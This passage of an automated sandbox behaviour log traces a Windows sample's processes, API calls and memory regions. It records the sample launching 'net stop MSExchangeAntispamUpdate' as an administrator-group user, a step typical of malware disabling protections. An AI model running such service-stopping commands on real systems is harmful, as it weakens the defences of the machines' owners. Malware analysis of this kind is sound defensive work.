_wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.231] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.231] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0135.232] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeAntispamUpdate", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x25f3c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeAntispamUpdate", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25f414 | out: lpCommandLine="net stop MSExchangeAntispamUpdate", lpProcessInformation=0x25f414*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe48, dwThreadId=0x718)) returned 1 [0135.238] CloseHandle (hObject=0xa4) returned 1 [0135.238] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0135.238] GetEnvironmentStringsW () returned 0x4459ee8* [0135.238] FreeEnvironmentStringsA (penv="=") returned 1 [0135.238] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0135.418] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x25f3ac | out: lpExitCode=0x25f3ac*=0x2) returned 1 [0135.418] CloseHandle (hObject=0xa8) returned 1 [0135.418] _vsnwprintf (in: _Buffer=0x25f494, _BufferCount=0x13, _Format="%08X", _ArgList=0x25f3b4 | out: _Buffer="00000002") returned 8 [0135.418] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0135.418] GetEnvironmentStringsW () returned 0x4457d80* [0135.418] FreeEnvironmentStringsA (penv="=") returned 1 [0135.418] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0135.418] GetEnvironmentStringsW () returned 0x4457d80* [0135.418] FreeEnvironmentStringsA (penv="=") returned 1 [0135.418] DeleteProcThreadAttributeList (in: lpAttributeList=0x25f440 | out: lpAttributeList=0x25f440) [0135.418] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.418] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0135.419] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.419] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0135.419] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.419] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0135.420] SetConsoleInputExeNameW () returned 0x1 [0135.420] GetConsoleOutputCP () returned 0x1b5 [0135.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.420] exit (_Code=2) Thread: id = 599 os_tid = 0xe4c Process: id = "190" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1122d000" os_pid = "0xe14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "189" os_parent_pid = "0x210" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9660 start_va = 0x7f0be000 end_va = 0x7f0befff entry_point = 0x0 region_type = private name = "private_0x000000007f0be000" filename = "" Region: id = 9661 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9662 start_va = 0x697c0f0000 end_va = 0x697c10ffff entry_point = 0x0 region_type = private name = "private_0x000000697c0f0000" filename = "" Region: id = 9663 start_va = 0x697c110000 end_va = 0x697c123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000697c110000" filename = "" Region: id = 9664 start_va = 0x697c130000 end_va = 0x697c16ffff entry_point = 0x0 region_type = private name = "private_0x000000697c130000" filename = "" Region: id = 9665 start_va = 0x7df5ffc10000 end_va = 0x7ff5ffc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc10000" filename = "" Region: id = 9666 start_va = 0x7ff6c45b0000 end_va = 0x7ff6c45d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c45b0000" filename = "" Region: id = 9667 start_va = 0x7ff6c45da000 end_va = 0x7ff6c45dafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45da000" filename = "" Region: id = 9668 start_va = 0x7ff6c45de000 end_va = 0x7ff6c45dffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45de000" filename = "" Region: id = 9669 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9670 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9671 start_va = 0x697c0f0000 end_va = 0x697c0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000697c0f0000" filename = "" Region: id = 9672 start_va = 0x697c100000 end_va = 0x697c106fff entry_point = 0x0 region_type = private name = "private_0x000000697c100000" filename = "" Region: id = 9673 start_va = 0x697c170000 end_va = 0x697c22dfff entry_point = 0x697c170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9674 start_va = 0x697c230000 end_va = 0x697c230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000697c230000" filename = "" Region: id = 9675 start_va = 0x697c240000 end_va = 0x697c246fff entry_point = 0x0 region_type = private name = "private_0x000000697c240000" filename = "" Region: id = 9676 start_va = 0x697c250000 end_va = 0x697c250fff entry_point = 0x0 region_type = private name = "private_0x000000697c250000" filename = "" Region: id = 9677 start_va = 0x697c260000 end_va = 0x697c35ffff entry_point = 0x0 region_type = private name = "private_0x000000697c260000" filename = "" Region: id = 9678 start_va = 0x697c360000 end_va = 0x697c39ffff entry_point = 0x0 region_type = private name = "private_0x000000697c360000" filename = "" Region: id = 9679 start_va = 0x697c3a0000 end_va = 0x697c527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000697c3a0000" filename = "" Region: id = 9680 start_va = 0x697c530000 end_va = 0x697c530fff entry_point = 0x0 region_type = private name = "private_0x000000697c530000" filename = "" Region: id = 9681 start_va = 0x697c550000 end_va = 0x697c55ffff entry_point = 0x0 region_type = private name = "private_0x000000697c550000" filename = "" Region: id = 9682 start_va = 0x697c560000 end_va = 0x697c6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000697c560000" filename = "" Region: id = 9683 start_va = 0x697c6f0000 end_va = 0x697daeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000697c6f0000" filename = "" Region: id = 9684 start_va = 0x7ff6c44b0000 end_va = 0x7ff6c45affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44b0000" filename = "" Region: id = 9685 start_va = 0x7ff6c45dc000 end_va = 0x7ff6c45ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45dc000" filename = "" Region: id = 9686 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9687 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9688 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9689 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9690 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9691 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9692 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9693 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9694 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9695 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9696 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9697 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9698 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9699 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 596 os_tid = 0x354 Thread: id = 597 os_tid = 0xe44 Thread: id = 598 os_tid = 0xe3c Process: id = "191" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xfa29000" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "189" os_parent_pid = "0x210" cmd_line = "net stop MSExchangeAntispamUpdate" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9713 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 9714 start_va = 0x800000 end_va = 0x47fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 9715 start_va = 0x4800000 end_va = 0x481ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 9716 start_va = 0x4820000 end_va = 0x4821fff entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 9717 start_va = 0x4830000 end_va = 0x4843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004830000" filename = "" Region: id = 9718 start_va = 0x4850000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 9719 start_va = 0x4890000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 9720 start_va = 0x4910000 end_va = 0x4913fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 9721 start_va = 0x4920000 end_va = 0x4920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 9722 start_va = 0x4930000 end_va = 0x4931fff entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 9723 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9724 start_va = 0x7efe0000 end_va = 0x7f002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9725 start_va = 0x7f00b000 end_va = 0x7f00dfff entry_point = 0x0 region_type = private name = "private_0x000000007f00b000" filename = "" Region: id = 9726 start_va = 0x7f00e000 end_va = 0x7f00efff entry_point = 0x0 region_type = private name = "private_0x000000007f00e000" filename = "" Region: id = 9727 start_va = 0x7f00f000 end_va = 0x7f00ffff entry_point = 0x0 region_type = private name = "private_0x000000007f00f000" filename = "" Region: id = 9728 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9729 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9730 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9731 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9732 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9733 start_va = 0x4ae0000 end_va = 0x4aeffff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 9734 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9735 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9736 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 9737 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 600 os_tid = 0x718 Thread: id = 601 os_tid = 0x27c Process: id = "192" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x3c439000" os_pid = "0x2ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "191" os_parent_pid = "0xe48" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeAntispamUpdate" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9738 start_va = 0x40000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 9739 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9740 start_va = 0x70000 end_va = 0x83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 9741 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 9742 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9743 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 9744 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 9745 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9746 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 9747 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 9748 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9749 start_va = 0x7e8b0000 end_va = 0x7e8d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8b0000" filename = "" Region: id = 9750 start_va = 0x7e8da000 end_va = 0x7e8dafff entry_point = 0x0 region_type = private name = "private_0x000000007e8da000" filename = "" Region: id = 9751 start_va = 0x7e8dc000 end_va = 0x7e8dcfff entry_point = 0x0 region_type = private name = "private_0x000000007e8dc000" filename = "" Region: id = 9752 start_va = 0x7e8dd000 end_va = 0x7e8dffff entry_point = 0x0 region_type = private name = "private_0x000000007e8dd000" filename = "" Region: id = 9753 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9754 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9755 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9756 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9757 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9758 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 9759 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9760 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9761 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9762 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9763 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9764 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 9765 start_va = 0x180000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 9766 start_va = 0x310000 end_va = 0x3cdfff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9767 start_va = 0x3d0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 9768 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9769 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 9770 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 9771 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 9772 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 9773 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 9774 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 9775 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 9776 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 9777 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9778 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9779 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9780 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9781 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9782 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9783 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9784 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9785 start_va 